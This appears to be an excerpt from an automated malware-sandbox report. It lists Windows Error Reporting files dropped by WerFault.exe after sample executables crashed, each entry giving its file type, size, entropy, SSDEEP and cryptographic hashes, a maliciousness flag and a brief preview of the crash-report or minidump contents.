                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.937605307481161
                                                Encrypted:false
                                                SSDEEP:192:bghpYdIHpzpzIypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:MhCIH9dIyn56reJtjKzuiFrY4IO8buT
                                                MD5:DCD300B811E59D055706C054C261E74E
                                                SHA1:811E99CB6A7C73D7DC2499A3F7483260E3C83C64
                                                SHA-256:1DD2789A24B847C16AA7298B77C7B7921AA0DBE5237C24291C978386A51C7AEB
                                                SHA-512:DE2B886220F4C7729FC41678CD16D7B1496F006F76259B73D5E0B81932D17493F4AE8FA2DBBA70732F9806376E47B173BE50D558FFC3B35F1CCF86922C7BB7C9
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.4.7.9.1.4.3.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.2.5.f.3.4.8.-.f.c.1.c.-.4.3.e.9.-.9.6.9.c.-.f.4.8.8.4.5.5.d.4.7.d.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.1.d.0.5.8.4.-.6.1.1.d.-.4.8.5.c.-.b.e.e.8.-.b.a.5.4.7.7.9.7.7.d.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9374199248073891
                                                Encrypted:false
                                                SSDEEP:384:WzLZCIH9duyn56reJtjKzuiFrY4IO8buT:a5j56rgjKzuiFrY4IO8
                                                MD5:6CF69656B91DBCC030B3701ACE1FA1C7
                                                SHA1:2398E862907F4E2DD24C93CD16E2A6EBDFB00679
                                                SHA-256:4BC8F303B84FDED29A4F0758C897333C1355A063E77D629CC75CE9E202128447
                                                SHA-512:9BD441F33D33C5367620E800037CF8984520C89C21D1A659DFFF47027B34C6BEAC0614E06874E6A423E5D66FA1A3E6751111619FF7A92C8073078517430B4134
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.1.7.4.9.4.2.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.6.7.0.1.1.0.-.4.5.8.0.-.4.a.7.3.-.a.4.d.1.-.3.2.c.5.e.e.d.a.d.2.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.b.9.9.f.7.2.-.d.d.6.f.-.4.e.7.a.-.9.6.d.0.-.d.0.e.6.5.f.6.b.9.a.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9303943800349092
                                                Encrypted:false
                                                SSDEEP:192:JpYdIHpzpz4ypS056rep3pjjR4ZrPMzuiFrZ24IO8bpwpt7:JCIH9d4yn56reJtjFzuiFrY4IO8buT
                                                MD5:E68323E0E301EFFF6CA7DCB084A8F636
                                                SHA1:9DCA2E95C1927C92B7B624F28640963C03019F7A
                                                SHA-256:FC74544DECF941EF3109BCA7D4F10AA705108826F334C63A2D5AB5C919117862
                                                SHA-512:E205CA44F707B5F6D10CC5EC3A5B4FD5698826AEF4804F3F0299E314C56D54264B873CA1DE5D26CD19A623EECDC2A0D5EDB71A1C4E20093D2F090BEB2D2D9605
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.0.4.5.4.5.1.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.7.8.6.7.e.b.-.c.c.c.1.-.4.7.e.5.-.b.1.5.e.-.9.c.3.a.9.4.f.e.2.e.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.3.0.0.5.e.4.-.4.9.b.3.-.4.9.c.a.-.b.d.f.8.-.2.4.3.3.f.7.d.5.a.2.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9304746472994024
                                                Encrypted:false
                                                SSDEEP:192:6UpYdIHpzpz6ypS056rep3pjjR4ZrPMzuiFrZ24IO8bpwpt:6UCIH9d6yn56reJtjFzuiFrY4IO8buT
                                                MD5:6DD42C6834AC1F4D606EB24B66A66D8B
                                                SHA1:3F04AA63A85BF9A2CE6CA8F0C70E725B147BB274
                                                SHA-256:147EE33DF9B1515079E438EB8C7B4A73D6C2D0DBB4A368EC9ACC09EFEBC4B60F
                                                SHA-512:29E7143B41FDAFB1081B627100A88E5957519EE830B8CF87F1EC363B231E1ACD6A2E7122D59C72B55F904E5C362CCE33DE67718FC10212BB5DD586A8FA36E68A
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.5.9.2.7.8.2.9.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.f.4.1.f.5.e.-.6.2.2.7.-.4.a.e.3.-.b.f.1.b.-.5.1.8.3.0.1.d.5.4.a.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.c.7.9.2.0.6.-.0.1.5.d.-.4.1.5.a.-.b.f.0.8.-.e.4.2.e.2.2.1.8.8.8.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9430481199281755
                                                Encrypted:false
                                                SSDEEP:96:3amXhJvs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9tZZ:zvvQ056rwjR4Zr+NzuiFrZ24IO8a8
                                                MD5:A5B9A76E0EBEBC72750565875B1D3AD2
                                                SHA1:8A7288F097AB6095D69216EFA0FD517855AED1E1
                                                SHA-256:A28DB64A5A306FB12983C3F5F3BE98F2DC57545AE3B8FFA2C72DB4AFDF9878CE
                                                SHA-512:A6ED4504A6EDBB96558F43909C845614E12346559A1C441DE8A571E650D44C3887EA83A748FB41F012E2EC7C84845F59270355466AE1A060114FCE1E2432D38C
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.5.8.1.8.5.1.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.6.1.7.9.a.c.-.8.9.1.6.-.4.0.7.f.-.9.1.d.c.-.a.5.a.1.4.9.7.2.c.7.f.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.0.8.9.7.2.a.-.a.6.3.7.-.4.d.0.6.-.a.1.c.6.-.9.e.3.1.b.2.d.f.1.3.0.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.4.0.c.3.-.7.1.7.3.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9076248951799786
                                                Encrypted:false
                                                SSDEEP:96:tMjXhJF9s1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9ts:tQvF9Q056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:2595AD899D8ECA2C89B26D9BB545ED91
                                                SHA1:2D60475693A8CD1510DC3D3FD18C03E82383A5F3
                                                SHA-256:D03AAE88D458FF2A994317E93C68749F30A0479FC5F825DAC05D13895CBE21BE
                                                SHA-512:C7C2C5C77D0C7F97AC6CE2C47867CB550692E0ED1A7A00587DEC62D99D262955344542717671663D71899D6E2C2A7ABDE9AC05D4B332B47A0827A99717035AB6
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9077335567353353
                                                Encrypted:false
                                                SSDEEP:96:A0RXhJxs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9tZ+:hxvxQ056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:08757A26A1D932A0C44F9CEBC8133947
                                                SHA1:542EFE781DE972A771F6D9EFF5947113D8C4D843
                                                SHA-256:A2821B26B8FEF43B0FF563ED642226E494A9A01D5216D2BC0472F660937A07E2
                                                SHA-512:C6C847A6980638CF516A6217AE9265A99B9F92606017EC0DA71A135D2B54078DDBDD0A11D3AF23045E07E0E44A9404AFC4F136BE83CF7B8D2BFD823583C07015
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9078160015063432
                                                Encrypted:false
                                                SSDEEP:96:qJaVXhJMs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9ts:UYvMQ056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:C7108C5CDD46FF21F8506B890E1C500A
                                                SHA1:311026B0B7EF48C01127B482671390A23ABF5B85
                                                SHA-256:0FE313BAA29D09AF21059ABD7B15B8C6969D8C99547D823551F43E66D8C5D559
                                                SHA-512:31B933DDA74694C808E31658D22921B3DEF08BD8CBB283055906AEA43405A20A32F004E8622C7B78517063EB511F35E444EFE11E855F83B07B1B72142CE7065C
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9077390562342458
                                                Encrypted:false
                                                SSDEEP:96:r95PXhJcs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9ts:J5vvcQ056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:0209A6BE96A7873DE7C74C785CA95761
                                                SHA1:23E7BC270800A31CBE9B645B2291333F92D6BD30
                                                SHA-256:4A00C885B0641E14B2FB2F2084344E75B6BC2F1A124E5ADCBAA8E5C1D76D3D7C
                                                SHA-512:8C7C6A473EA45A82267833DAD2F903DF88EBEE81E6741DBE31557CE928DED6E1CDC5021A933A91FF83F43D5568A5D620CD6E4ED35825F2CB7E694315CE478CC4
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8580526450272092
                                                Encrypted:false
                                                SSDEEP:96:U60XhJBus1h/H7if2QXIDcQuc6BcE/cw3u+HbHgoZee4nyNIPzOyRgo2ftZrcmEv:f8vBuH0gF1jjbHZrGzuiFrZ24IO8P8
                                                MD5:6403AA7A8B8A866C48ED514BC5154BCC
                                                SHA1:FC80555D938C58C219DCB8BDE451274EC2389076
                                                SHA-256:E480F2459C365D927468800E129B299DD2477DEDCF9216CEB13DE9E358D609CF
                                                SHA-512:6B859CE1659BB04C6D023B5779E5BE839FCDFA67C5813AD7F5A38A36F76946158269A01B1CF9E2DF3A3638B7B4D10FF4794A95302ED94DE558C3DFC544CB499E
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9075338271961502
                                                Encrypted:false
                                                SSDEEP:192:PvMA0JsAnbcA/jR4Zr+UzuiFrZ24IO8a8:PvMbJsAnbcA/jqzuiFrY4IO8a
                                                MD5:71755F9F025F0EC846898849AFF1A09E
                                                SHA1:BAFD0B88FF0A1E371F6AB2633F024E00DCDBF3F4
                                                SHA-256:6E79FA19C1633ADB5A91D6ECC794F34D41CD9DCEB0F5FBC54E46BA30AF3F1AD9
                                                SHA-512:19B7D37FE5E359443F7400388A5DDF152DBD6B869BC110702778107B496DE044A33071A925323B57BD702973D38ED6480EB2F01F52943D0BDFABA3E8D4D25D29
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:39 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):85856
                                                Entropy (8bit):2.3530009678156425
                                                Encrypted:false
                                                SSDEEP:768:scsqZdQH76nNdq2iytq6JoOHUO7wK2M9DDKv:sgzNLqNOHUO7wwXKv
                                                MD5:75A24893857D26B42163EC57F4AC6022
                                                SHA1:175DDE8A7D57467D800B83965868033B8CF2D1BF
                                                SHA-256:50424C8AA6A6F803202E38661F7E50EF41CDB851D6A69363737CF9545DFED83D
                                                SHA-512:867C5162BC7F8FACFBF91B97A4FCF7BA34F71C949B902DC3436BFAACAAF17A37849AC08F005DF902C287C49EA514FF1F2E350696931D1272E4E41D5DEDD59D1B
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.6985113365025244
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpu262RG6Y2DOSU9T1C05gmfppdaWpBu89b8ROsfcq+Bm:R6lXJLR6B6YjSU9s05gmfpj18RNfc18
                                                MD5:D5589D6B8FC709671F692699B64B1CEA
                                                SHA1:79EB27696E9A2832DD2B47597082454D2C3C47B9
                                                SHA-256:474A4A401158AEB6404905FF28E22C4A9817676A590A6778FFE3E0773AEA979E
                                                SHA-512:7DDB9DF0F869029846E623DFAFCC8D4D0BB3BD954ED31EB8AD2ED37C96B231032A666AEA1F05BC10E446B839B97C6BB9E9E735206AA09D0DFF560643C711DCC4
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.494996330281959
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYEYm8M4JqtF++q8v2Me7Bsd:uIjfxI70g7VIJFKu7Bsd
                                                MD5:5DCC0A984A4014FA4F5988609288AD25
                                                SHA1:0C7C043A974102D1BAF91CE8EE19450FA12C77B9
                                                SHA-256:CBA0954C09D95E9223E11AED322EE38F76C3E9F864549D902A20D7364560125C
                                                SHA-512:502D625E63CE78796A13D2FE0A93E3392980F614ADC9B3F90250CA0F8BABFF96CC3DCC3BEB15902BDB5515DF8BFE2487D21AD6B1D839273A06ED70841F64C2CF
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:40 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):87508
                                                Entropy (8bit):2.388850286430915
                                                Encrypted:false
                                                SSDEEP:768:dHRZdQI+v7MR+kr5g2iytq6JoOHUO7wK2M9KadBnDp:d35+ogk5qNOHUO7wwLdNp
                                                MD5:5F2B22E9B56E6D2581A65F1897295413
                                                SHA1:A3F1F48AD19A7D1D77F8ABCAE6182D53CA65380B
                                                SHA-256:C4E045943CE27AAE322239919C1BD97C3EBDFA3C34D8503BAF5E500261837C7F
                                                SHA-512:EDFD7FCE0224D50CE7CE52D79B7B20B98E05119503616F77A6B4BAAE7700D51469C1C90DFE07F01ECAC809C525C61EE5C7D7D849027679BEAEEDA3401706DFBC
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8412
                                                Entropy (8bit):3.6979018937666144
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpud62l6Y2DFSU9dogmfppdaWpBT89bkOsf0qsm:R6lXJLq6U6YISU9qgmfpjGkNfJ
                                                MD5:FEB7B2CDAA629E75A595D1A713D912C7
                                                SHA1:3B92BE7E7E3004E3A1673FE9E61A3D1332309858
                                                SHA-256:0F16DDCFA7D493815C0A5C59B3E379CD2EA0BF93B77DBDCE13A985E1E65D71E4
                                                SHA-512:62E2C961E8E80F7A7BAD86C1DE9506B478C11901CDCD5CA8CE21B8AC21630449CCC696C142B2A94B90186C14F39C6D4CB0FE4C16CB319D98EEA9FD76B2FE8544
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.496064229115757
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYHYm8M4JqtFhjlo+q8v2Me7Bsd:uIjfxI70g7VfJEoKu7Bsd
                                                MD5:AE2D8C1BB3771B9BE8AA84F02037BF48
                                                SHA1:3E1FC9D254EE1C9DFE92962C8C39634E802F3DF1
                                                SHA-256:5235EB3A3A602A0977795BB92BC5E87950CE0356D13A38BEAB5F1EB8D5288575
                                                SHA-512:D6E2224D4BA2B203856CC38D20E1518C26EA6F66409374A1A7D8D683126B700E587A70C204C0EA27562430126F0CF45768B954A28B4EF296EEF98F75C1B67591
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:41 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):93048
                                                Entropy (8bit):2.3560133241605388
                                                Encrypted:false
                                                SSDEEP:768:FqriJ27mENDUxfP2iytq6JoO0UO7wK2M9bjzZIqooi:wiQNDqeqNO0UO7wwFLoo
                                                MD5:BE4E2D92157321D976B5266B2AA7235D
                                                SHA1:78B5E9013AC5D8BB43B85CD83256571F09DC45D7
                                                SHA-256:2A6B2567255AF3C3F9A3BF18C468F329E2A0362B9B682FC58370C21F08613F36
                                                SHA-512:AB63C92E6FEDEF4472C99D68938BCCC8960F2B47BEF855CE343B6F98398D143AA5048BD545F13FCA15CC1EEB51186F74F1AB0CD06734A6BC564FFD5628611E21
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8412
                                                Entropy (8bit):3.69806564573605
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuR6f6Y2DoSU9q8MFgmfppdaWpB089bWOsf0tjSm:R6lXJLG6f6YlSU9ygmfpjzWNfEH
                                                MD5:ABBB95E83218FB850504503859BD063E
                                                SHA1:FEE61D2B539A5E98680C16F729497D0C2182D843
                                                SHA-256:1C27EDFB953F1FEFA2EA86DD12387341DEF329272308C6FCA1D3027B282B7EDE
                                                SHA-512:12FB3D7E3A716B3CE678C23F10D006799BF65721E48DF3F42059A98DAF6C33C212037B16322CC71CC4F3EFE7E2EC5844E455436C95A6B19FC079B591D86FA946
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4952586435216535
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYUYm8M4JqtFwX+q8v2Me7Bsd:uIjfxI70g7VcJxXKu7Bsd
                                                MD5:10F93B08AA6AB78F1AD2A35D4BB0C1AA
                                                SHA1:4EC51F95894C852B44FA9A6D00215EAC6CB2B525
                                                SHA-256:871001DDF28C0FEEBC949834603C4A636FD33C4239A593A5B259033CC5BAF5D7
                                                SHA-512:A2FE5F27890911422D2123D6328D5BE3EF6C78642367DEED152CFE48EB358D586C99168A327A07530989855AD067484E10BACCE907E7F484594817D7338253C2
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:42 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):99902
                                                Entropy (8bit):2.120601791832267
                                                Encrypted:false
                                                SSDEEP:384:Hs2IpnpYm7SmEoNETAslG7f4Uj7ExK2MnWZfq064YzSP+2pG2Y7b:Hs1pnp37fETAsQ7gu7wK2Mnw3YzSm0c
                                                MD5:6BF4BA4C2F1ADDBC3F210248018297BC
                                                SHA1:E33E6B841B484A7CF8DB07B456A095D292AC1EF1
                                                SHA-256:7EDF5DE831695D25C013758C0C90D7AFCE15D7149304CE7C9A242BAF6CB3EF01
                                                SHA-512:120EB11C8686022BD7F7260D450360F4CEFB6E2FE85DD1EDBF40E92A43F5A3AB2181C90795B470FCE798B253AC4A8EC86460C19D2484C21018D2BF829688273E
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g....................................t...`C..........T.......8...........T...........H,...Y......................................................................................................eJ......H.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8412
                                                Entropy (8bit):3.700627330406827
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuJh686Y2DOSU9q8MFgmfppdaWpB989bWOsfUSm:R6lXJL0h686YjSU9ygmfpjYWNfg
                                                MD5:0EA7CFF8DD174CDAAA4DEFA4B49E066D
                                                SHA1:C5D1789C06DBDDC48BFFDEF13F9B4DBF017FECF7
                                                SHA-256:49152563C9FAB3B044AA017431D4EA8475C23254D2C84389EE0DB2411A1C1A5C
                                                SHA-512:34F6FD087AF1E050454E89F87A3AEE0319C48CB82D391048077ADAE3C6E168C2D0F5A5ACB14126F076151536AD2CB2AA539D6627B95DCAD2BCD192949791035A
                                                Malicious:false
